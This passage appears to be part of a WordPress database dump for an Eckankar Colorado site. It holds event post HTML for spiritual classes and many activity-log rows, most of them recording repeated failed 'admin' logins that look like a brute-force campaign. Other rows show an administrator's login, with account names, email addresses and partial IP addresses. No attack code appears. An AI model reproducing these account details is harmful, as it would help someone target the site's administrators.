found. Discover spiritual secrets to help you realize the profound reality of God’s love in your life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">*When was the last time you recognized even a small miracle in your life?</span><br>\r\n<span style=\"font-size: 14pt;\">*Discover spiritual secrets to help you realize the profound reality of God’s love in your everyday life.</span><br>\r\n<span style=\"font-size: 14pt;\">*Explore how everything that happens to you is truly is for your highest spiritual benefit.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come share your insights and explore how gaining an understanding of The Power of God’s Grace can help you handle challenges in a better way, develop the quality of divine love, and become more godlike.</span></p>\r\n<p>&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/296647792/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237711,40421,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Past Lives, Dreams and Soul Travel<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Have you ever thought about where you go when you close your eyes - when you daydream, or at night when you dream? Sometimes our dreams and imagination seem more real than everyday life. That\'s Soul Travel. It\'s a natural process that opens the door to the incredible universes where we truly live and have our being. </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As Soul, a divine spark of God, we are spiritual beings with the ability to shift our state of consciousness at will and experience greater love, freedom and awareness in our daily lives. This interactive class will focus primarily on Soul Travel, (but will likely touch on Past Lives and Dreams too.) We will cover tools, or techniques, you can use on your spiritual journey, regardless of your spiritual orientation. You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. This is the&nbsp;<strong>second</strong>&nbsp;of two classes on Soul Travel. Hope to see you there!</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296983282/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237619,40405,'failed_username','admin'),(237620,40405,'server_http_user_agent','Mozilla/5.0'),(237621,40405,'_message_key','user_unknown_login_failed'),(237622,40405,'_server_remote_addr','20.168.9.x'),(237623,40406,'failed_username','admin'),(237624,40406,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(237625,40406,'_message_key','user_unknown_login_failed'),(237626,40406,'_server_remote_addr','23.97.205.x'),(237627,40407,'failed_username','admin'),(237628,40407,'server_http_user_agent','Mozilla/5.0'),(237629,40407,'_message_key','user_unknown_login_failed'),(237630,40407,'_server_remote_addr','20.168.9.x'),(237631,40408,'failed_username','admin'),(237632,40408,'server_http_user_agent','Mozilla/5.0'),(237633,40408,'_message_key','user_unknown_login_failed'),(237634,40408,'_server_remote_addr','20.168.9.x'),(237635,40409,'failed_username','admin'),(237636,40409,'server_http_user_agent','Mozilla/5.0'),(237637,40409,'_message_key','user_unknown_login_failed'),(237638,40409,'_server_remote_addr','20.168.9.x'),(237639,40410,'failed_username','admin'),(237640,40410,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(237641,40410,'_message_key','user_unknown_login_failed'),(237642,40410,'_server_remote_addr','202.134.19.x'),(237643,40411,'failed_username','admin'),(237644,40411,'server_http_user_agent','Mozilla/5.0'),(237645,40411,'_message_key','user_unknown_login_failed'),(237646,40411,'_server_remote_addr','20.168.9.x'),(237647,40412,'failed_username','admin'),(237648,40412,'server_http_user_agent','Mozilla/5.0'),(237649,40412,'_message_key','user_unknown_login_failed'),(237650,40412,'_server_remote_addr','20.168.9.x'),(237651,40413,'failed_username','admin'),(237652,40413,'server_http_user_agent','Mozilla/5.0'),(237653,40413,'_message_key','user_unknown_login_failed'),(237654,40413,'_server_remote_addr','20.168.9.x'),(237655,40414,'failed_username','admin'),(237656,40414,'server_http_user_agent','Mozilla/5.0'),(237657,40414,'_message_key','user_unknown_login_failed'),(237658,40414,'_server_remote_addr','20.168.9.x'),(237659,40415,'failed_username','admin'),(237660,40415,'server_http_user_agent','Mozilla/5.0'),(237661,40415,'_message_key','user_unknown_login_failed'),(237662,40415,'_server_remote_addr','20.168.9.x'),(237663,40416,'user_id','15'),(237664,40416,'user_email','nadazipought@zilch.org'),(237665,40416,'user_login','john-admin-96'),(237666,40416,'_user_id','15'),(237667,40416,'_user_login','john-admin-96'),(237668,40416,'_user_email','nadazipought@zilch.org'),(237669,40416,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(237670,40416,'_message_key','user_logged_in'),(237671,40416,'_server_remote_addr','184.96.209.x'),(237672,40416,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(237673,40417,'post_id','269301'),(237674,40417,'post_type','mec-events'),(237675,40417,'post_title','Copy of The Power of Grace'),(237676,40417,'_message_key','post_updated'),(237677,40417,'_user_id','15'),(237678,40417,'_user_login','john-admin-96'),(237679,40417,'_user_email','nadazipought@zilch.org'),(237680,40417,'_server_remote_addr','184.96.209.x'),(237681,40417,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events'),(237682,40418,'failed_username','admin'),(237683,40418,'server_http_user_agent','Mozilla/5.0'),(237684,40418,'_message_key','user_unknown_login_failed'),(237685,40418,'_server_remote_addr','20.168.9.x'),(237686,40419,'failed_username','wadminw'),(237687,40419,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(237618,40404,'_server_remote_addr','20.168.9.x'),(237616,40404,'server_http_user_agent','Mozilla/5.0'),(237617,40404,'_message_key','user_unknown_login_failed'),(237614,40403,'_server_remote_addr','107.189.11.x'),(237615,40404,'failed_username','admin'),(237613,40403,'_message_key','user_unknown_login_failed'),(237478,40370,'failed_username','admin'),(237479,40370,'server_http_user_agent','Mozilla/5.0'),(237480,40370,'_message_key','user_unknown_login_failed'),(237481,40370,'_server_remote_addr','20.168.9.x'),(237482,40371,'failed_username','admin'),(237483,40371,'server_http_user_agent','Mozilla/5.0'),(237484,40371,'_message_key','user_unknown_login_failed'),(237485,40371,'_server_remote_addr','20.168.9.x'),(237486,40372,'failed_username','admin'),(237487,40372,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(237488,40372,'_message_key','user_unknown_login_failed'),(237489,40372,'_server_remote_addr','147.135.255.x'),(237490,40373,'failed_username','admin'),(237491,40373,'server_http_user_agent','Mozilla/5.0'),(237492,40373,'_message_key','user_unknown_login_failed'),(237493,40373,'_server_remote_addr','20.168.9.x'),(237494,40374,'failed_username','admin'),(237495,40374,'server_http_user_agent','Mozilla/5.0'),(237496,40374,'_message_key','user_unknown_login_failed'),(237497,40374,'_server_remote_addr','20.168.9.x'),(237498,40375,'failed_username','admin'),(237499,40375,'server_http_user_agent','Mozilla/5.0'),(237500,40375,'_message_key','user_unknown_login_failed'),(237501,40375,'_server_remote_addr','20.168.9.x'),(237502,40376,'failed_username','admin'),(237503,40376,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(237504,40376,'_message_key','user_unknown_login_failed'),(237505,40376,'_server_remote_addr','116.62.206.x'),(237506,40377,'failed_username','admin'),(237507,40377,'server_http_user_agent','Mozilla/5.0'),(237508,40377,'_message_key','user_unknown_login_failed'),(237509,40377,'_server_remote_addr','20.168.9.x'),(237510,40378,'failed_username','admin'),(237511,40378,'server_http_user_agent','Mozilla/5.0'),(237512,40378,'_message_key','user_unknown_login_failed'),(237513,40378,'_server_remote_addr','20.168.9.x'),(237514,40379,'failed_username','admin'),(237515,40379,'server_http_user_agent','Mozilla/5.0'),(237516,40379,'_message_key','user_unknown_login_failed'),(237517,40379,'_server_remote_addr','20.168.9.x'),(237518,40380,'failed_username','admin'),(237519,40380,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(237520,40380,'_message_key','user_unknown_login_failed'),(237521,40380,'_server_remote_addr','35.187.58.x'),(237522,40381,'failed_username','admin'),(237523,40381,'server_http_user_agent','Mozilla/5.0'),(237524,40381,'_message_key','user_unknown_login_failed'),(237525,40381,'_server_remote_addr','20.168.9.x'),(237526,40382,'failed_username','admin'),(237527,40382,'server_http_user_agent','Mozilla/5.0'),(237528,40382,'_message_key','user_unknown_login_failed'),(237529,40382,'_server_remote_addr','20.168.9.x'),(237530,40383,'plugin_name','Simple History'),(237531,40383,'plugin_current_version','4.7.1'),(237532,40383,'plugin_new_version','4.7.2'),(237533,40383,'_message_key','plugin_update_available'),(237534,40383,'_server_remote_addr','173.231.231.x'),(237535,40384,'failed_username','admin'),(237536,40384,'server_http_user_agent','Mozilla/5.0'),(237537,40384,'_message_key','user_unknown_login_failed'),(237538,40384,'_server_remote_addr','20.168.9.x'),(237539,40385,'failed_username','admin'),(237540,40385,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(237541,40385,'_message_key','user_unknown_login_failed'),(237542,40385,'_server_remote_addr','39.101.185.x'),(237543,40386,'failed_username','admin'),(237544,40386,'server_http_user_agent','Mozilla/5.0'),(237545,40386,'_message_key','user_unknown_login_failed'),(237546,40386,'_server_remote_addr','20.168.9.x'),(237547,40387,'failed_username','admin'),(237548,40387,'server_http_user_agent','Mozilla/5.0'),(237549,40387,'_message_key','user_unknown_login_failed'),(237550,40387,'_server_remote_addr','20.168.9.x'),(237551,40388,'failed_username','admin'),(237552,40388,'server_http_user_agent','Mozilla/5.0'),(237553,40388,'_message_key','user_unknown_login_failed'),(237554,40388,'_server_remote_addr','20.168.9.x'),(237555,40389,'failed_username','admin'),(237556,40389,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(237557,40389,'_message_key','user_unknown_login_failed'),(237558,40389,'_server_remote_addr','67.205.12.x'),(237559,40390,'failed_username','admin'),(237560,40390,'server_http_user_agent','Mozilla/5.0'),(237561,40390,'_message_key','user_unknown_login_failed'),(237562,40390,'_server_remote_addr','20.168.9.x'),(237563,40391,'failed_username','admin'),(237564,40391,'server_http_user_agent','Mozilla/5.0'),(237565,40391,'_message_key','user_unknown_login_failed'),(237566,40391,'_server_remote_addr','20.168.9.x'),(237567,40392,'failed_username','admin'),(237568,40392,'server_http_user_agent','Mozilla/5.0'),(237569,40392,'_message_key','user_unknown_login_failed'),(237570,40392,'_server_remote_addr','20.168.9.x'),(237571,40393,'failed_username','admin'),(237572,40393,'server_http_user_agent','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(237573,40393,'_message_key','user_unknown_login_failed'),(237574,40393,'_server_remote_addr','67.205.11.x'),(237575,40394,'failed_username','admin'),(237576,40394,'server_http_user_agent','Mozilla/5.0'),(237577,40394,'_message_key','user_unknown_login_failed'),(237578,40394,'_server_remote_addr','20.168.9.x'),(237579,40395,'failed_username','admin'),(237580,40395,'server_http_user_agent','Mozilla/5.0'),(237581,40395,'_message_key','user_unknown_login_failed'),(237582,40395,'_server_remote_addr','20.168.9.x'),(237583,40396,'failed_username','admin'),(237584,40396,'server_http_user_agent','Mozilla/5.0'),(237585,40396,'_message_key','user_unknown_login_failed'),(237586,40396,'_server_remote_addr','20.168.9.x'),(237587,40397,'failed_username','admin'),(237588,40397,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(237589,40397,'_message_key','user_unknown_login_failed'),(237590,40397,'_server_remote_addr','20.204.41.x'),(237591,40398,'failed_username','admin'),(237592,40398,'server_http_user_agent','Mozilla/5.0'),(237593,40398,'_message_key','user_unknown_login_failed'),(237594,40398,'_server_remote_addr','20.168.9.x'),(237595,40399,'failed_username','admin'),(237596,40399,'server_http_user_agent','Mozilla/5.0'),(237597,40399,'_message_key','user_unknown_login_failed'),(237598,40399,'_server_remote_addr','20.168.9.x'),(237599,40400,'failed_username','admin'),(237600,40400,'server_http_user_agent','Mozilla/5.0'),(237601,40400,'_message_key','user_unknown_login_failed'),(237602,40400,'_server_remote_addr','20.168.9.x'),(237603,40401,'failed_username','admin'),(237604,40401,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(237605,40401,'_message_key','user_unknown_login_failed'),(237606,40401,'_server_remote_addr','159.223.222.x'),(237607,40402,'failed_username','admin'),(237608,40402,'server_http_user_agent','Mozilla/5.0'),(237609,40402,'_message_key','user_unknown_login_failed'),(237610,40402,'_server_remote_addr','20.168.9.x'),(237611,40403,'failed_username','administrator'),(237612,40403,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(237477,40369,'_server_http_referer','https://sisdrewno.pl/wp-login.php'),(237476,40369,'_server_remote_addr','38.41.41.x'),(237475,40369,'_message_key','user_unknown_login_failed'),(237474,40369,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(237473,40369,'failed_username','admin'),(237411,40353,'_server_remote_addr','20.168.9.x'),(237342,40336,'_message_key','user_unknown_login_failed'),(237472,40368,'_server_http_referer','https://sisdrewno.pl/wp-login.php'),(237470,40368,'_message_key','user_unknown_login_failed'),(237471,40368,'_server_remote_addr','38.41.41.x'),(237469,40368,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(237468,40368,'failed_username','admin'),(237466,40367,'_message_key','user_unknown_login_failed'),(237467,40367,'_server_remote_addr','20.168.9.x'),(237465,40367,'server_http_user_agent','Mozilla/5.0'),(237464,40367,'failed_username','admin'),(237463,40366,'_server_remote_addr','91.238.164.x'),(237462,40366,'_message_key','user_unknown_login_failed'),(237461,40366,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(237460,40366,'failed_username','admin'),(237459,40365,'_server_remote_addr','20.168.9.x'),(237458,40365,'_message_key','user_unknown_login_failed'),(237457,40365,'server_http_user_agent','Mozilla/5.0'),(237456,40365,'failed_username','admin'),(237455,40364,'_server_remote_addr','20.168.9.x'),(237454,40364,'_message_key','user_unknown_login_failed'),(237452,40364,'failed_username','admin'),(237453,40364,'server_http_user_agent','Mozilla/5.0'),(237451,40363,'_server_remote_addr','8.219.51.x'),(237450,40363,'_message_key','user_unknown_login_failed'),(237449,40363,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(237448,40363,'failed_username','admin'),(237447,40362,'_server_remote_addr','20.168.9.x'),(237446,40362,'_message_key','user_unknown_login_failed'),(237444,40362,'failed_username','admin'),(237445,40362,'server_http_user_agent','Mozilla/5.0'),(237443,40361,'_server_remote_addr','20.168.9.x'),(237442,40361,'_message_key','user_unknown_login_failed'),(237441,40361,'server_http_user_agent','Mozilla/5.0'),(237440,40361,'failed_username','admin'),(237439,40360,'_server_remote_addr','20.168.9.x'),(237438,40360,'_message_key','user_unknown_login_failed'),(237436,40360,'failed_username','admin'),(237437,40360,'server_http_user_agent','Mozilla/5.0'),(237434,40359,'_message_key','user_unknown_login_failed'),(237435,40359,'_server_remote_addr','54.36.173.x'),(237433,40359,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(237432,40359,'failed_username','admin'),(237430,40358,'_message_key','user_unknown_login_failed'),(237431,40358,'_server_remote_addr','20.168.9.x'),(237429,40358,'server_http_user_agent','Mozilla/5.0'),(237428,40358,'failed_username','admin'),(237427,40357,'_server_remote_addr','20.168.9.x'),(237426,40357,'_message_key','user_unknown_login_failed'),(237425,40357,'server_http_user_agent','Mozilla/5.0'),(237424,40357,'failed_username','admin'),(237423,40356,'_server_remote_addr','20.168.9.x'),(237422,40356,'_message_key','user_unknown_login_failed'),(237420,40356,'failed_username','admin'),(237421,40356,'server_http_user_agent','Mozilla/5.0'),(237419,40355,'_server_remote_addr','8.219.51.x'),(237418,40355,'_message_key','user_unknown_login_failed'),(237417,40355,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(237416,40355,'failed_username','admin'),(237414,40354,'_message_key','user_unknown_login_failed'),(237415,40354,'_server_remote_addr','20.168.9.x'),(237412,40354,'failed_username','admin'),(237413,40354,'server_http_user_agent','Mozilla/5.0'),(237409,40353,'server_http_user_agent','Mozilla/5.0'),(237410,40353,'_message_key','user_unknown_login_failed'),(237408,40353,'failed_username','admin'),(237407,40352,'_server_remote_addr','20.168.9.x'),(237406,40352,'_message_key','user_unknown_login_failed'),(237403,40351,'_server_remote_addr','20.168.9.x'),(237404,40352,'failed_username','admin'),(237405,40352,'server_http_user_agent','Mozilla/5.0'),(237402,40351,'_message_key','user_unknown_login_failed'),(237401,40351,'server_http_user_agent','Mozilla/5.0'),(237400,40351,'failed_username','admin'),(237399,40350,'_server_remote_addr','67.205.11.x'),(237398,40350,'_message_key','user_unknown_login_failed'),(237397,40350,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(237396,40350,'failed_username','admin'),(237395,40349,'_server_remote_addr','20.168.9.x'),(237392,40349,'failed_username','admin'),(237393,40349,'server_http_user_agent','Mozilla/5.0'),(237394,40349,'_message_key','user_unknown_login_failed'),(237391,40348,'_server_remote_addr','20.168.9.x'),(237390,40348,'_message_key','user_unknown_login_failed'),(237389,40348,'server_http_user_agent','Mozilla/5.0'),(237387,40347,'_server_remote_addr','20.168.8.x'),(237388,40348,'failed_username','admin'),(237386,40347,'_message_key','user_unknown_login_failed'),(237385,40347,'server_http_user_agent','Mozilla/5.0'),(237384,40347,'failed_username','admin'),(237383,40346,'_server_remote_addr','20.168.9.x'),(237381,40346,'server_http_user_agent','Mozilla/5.0'),(237382,40346,'_message_key','user_unknown_login_failed'),(237380,40346,'failed_username','admin'),(237379,40345,'_server_remote_addr','69.163.224.x'),(237378,40345,'_message_key','user_unknown_login_failed'),(237377,40345,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(237376,40345,'failed_username','admin'),(237375,40344,'_server_remote_addr','20.168.9.x'),(237374,40344,'_message_key','user_unknown_login_failed'),(237373,40344,'server_http_user_agent','Mozilla/5.0'),(237371,40343,'_server_remote_addr','20.168.8.x'),(237372,40344,'failed_username','admin'),(237370,40343,'_message_key','user_unknown_login_failed'),(237369,40343,'server_http_user_agent','Mozilla/5.0'),(237368,40343,'failed_username','admin'),(237367,40342,'_server_remote_addr','20.168.9.x'),(237365,40342,'server_http_user_agent','Mozilla/5.0'),(237366,40342,'_message_key','user_unknown_login_failed'),(237364,40342,'failed_username','admin'),(237363,40341,'_server_remote_addr','20.168.9.x'),(237362,40341,'_message_key','user_unknown_login_failed'),(237361,40341,'server_http_user_agent','Mozilla/5.0'),(237359,40340,'_server_remote_addr','139.59.26.x'),(237360,40341,'failed_username','admin'),(237358,40340,'_message_key','user_unknown_login_failed'),(237357,40340,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(237355,40339,'_server_remote_addr','20.168.9.x'),(237356,40340,'failed_username','admin'),(237354,40339,'_message_key','user_unknown_login_failed'),(237353,40339,'server_http_user_agent','Mozilla/5.0'),(237352,40339,'failed_username','admin'),(237351,40338,'_server_remote_addr','20.168.8.x'),(237349,40338,'server_http_user_agent','Mozilla/5.0'),(237350,40338,'_message_key','user_unknown_login_failed'),(237348,40338,'failed_username','admin'),(237347,40337,'_server_remote_addr','20.168.9.x'),(237346,40337,'_message_key','user_unknown_login_failed'),(237345,40337,'server_http_user_agent','Mozilla/5.0'),(237344,40337,'failed_username','admin'),(237343,40336,'_server_remote_addr','20.168.9.x'),(237341,40336,'server_http_user_agent','Mozilla/5.0'),(237340,40336,'failed_username','admin'),(237339,40335,'_server_remote_addr','20.168.8.x'),(237338,40335,'_message_key','user_unknown_login_failed'),(237335,40334,'_server_remote_addr','165.227.236.x'),(237336,40335,'failed_username','admin'),(237337,40335,'server_http_user_agent','Mozilla/5.0'),(237334,40334,'_message_key','user_unknown_login_failed'),(237333,40334,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(237329,40333,'server_http_user_agent','Mozilla/5.0'),(237330,40333,'_message_key','user_unknown_login_failed'),(237331,40333,'_server_remote_addr','20.168.9.x'),(237332,40334,'failed_username','admin'),(237328,40333,'failed_username','admin'),(237327,40332,'_server_remote_addr','20.168.9.x'),(237326,40332,'_message_key','user_unknown_login_failed'),(237324,40332,'failed_username','admin'),(237325,40332,'server_http_user_agent','Mozilla/5.0'),(237323,40331,'_server_remote_addr','20.168.8.x'),(237322,40331,'_message_key','user_unknown_login_failed'),(237319,40330,'_server_remote_addr','20.14.94.x'),(237320,40331,'failed_username','admin'),(237321,40331,'server_http_user_agent','Mozilla/5.0'),(237318,40330,'_xmlrpc_request','true'),(237317,40330,'_message_key','user_unknown_login_failed'),(237316,40330,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(237315,40330,'failed_username','admin'),(237314,40329,'_server_remote_addr','107.189.11.x'),(237312,40329,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(237313,40329,'_message_key','user_unknown_login_failed'),(237311,40329,'failed_username','administrator'),(237310,40328,'_server_remote_addr','39.101.185.x'),(237309,40328,'_message_key','user_unknown_login_failed'),(237308,40328,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(237307,40328,'failed_username','admin'),(237306,40327,'_server_remote_addr','20.168.8.x'),(237304,40327,'server_http_user_agent','Mozilla/5.0'),(237305,40327,'_message_key','user_unknown_login_failed'),(237303,40327,'failed_username','admin'),(237302,40326,'_server_remote_addr','107.189.11.x'),(237301,40326,'_message_key','user_unknown_login_failed'),(237300,40326,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(237299,40326,'failed_username','admin'),(237298,40325,'_server_remote_addr','20.168.8.x'),(237296,40325,'server_http_user_agent','Mozilla/5.0'),(237297,40325,'_message_key','user_unknown_login_failed'),(237295,40325,'failed_username','admin'),(237294,40324,'_server_remote_addr','87.98.171.x'),(237293,40324,'_message_key','user_unknown_login_failed'),(237292,40324,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(237291,40324,'failed_username','admin'),(237290,40323,'_server_remote_addr','172.233.144.x'),(237289,40323,'_xmlrpc_request','true'),(237288,40323,'_message_key','user_unknown_login_failed'),(237287,40323,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(237286,40323,'failed_username','admin'),(237285,40322,'_server_remote_addr','172.233.144.x'),(237283,40322,'_message_key','user_unknown_login_failed'),(237284,40322,'_xmlrpc_request','true'),(237282,40322,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(237281,40322,'failed_username','admin'),(237279,40321,'_xmlrpc_request','true'),(237280,40321,'_server_remote_addr','172.233.144.x'),(237278,40321,'_message_key','user_unknown_login_failed'),(237276,40321,'failed_username','admin'),(237277,40321,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(237275,40320,'_server_remote_addr','20.168.8.x'),(237274,40320,'_message_key','user_unknown_login_failed'),(237273,40320,'server_http_user_agent','Mozilla/5.0'),(237272,40320,'failed_username','admin'),(237270,40319,'_message_key','user_unknown_login_failed'),(237271,40319,'_server_remote_addr','162.214.72.x'),(237269,40319,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(237268,40319,'failed_username','admin'),(237267,40318,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=68102&action=edit'),(237266,40318,'_server_remote_addr','76.130.120.x'),(237265,40318,'_message_key','user_logged_out'),(237264,40318,'_user_email','nada@zipnadanot.org'),(237262,40318,'_user_id','2'),(237263,40318,'_user_login','S8zhaBda'),(237261,40317,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=68102&action=edit'),(237260,40317,'_server_remote_addr','76.130.120.x'),(237259,40317,'_user_email','nada@zipnadanot.org'),(237256,40317,'_message_key','post_updated'),(237257,40317,'_user_id','2'),(237258,40317,'_user_login','S8zhaBda'),(237255,40317,'post_new_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.05), rgba(255, 255, 255, 0.05)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255,255,255,0.05)\" data-bg-overlaycolor-alpha=\"0.05\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 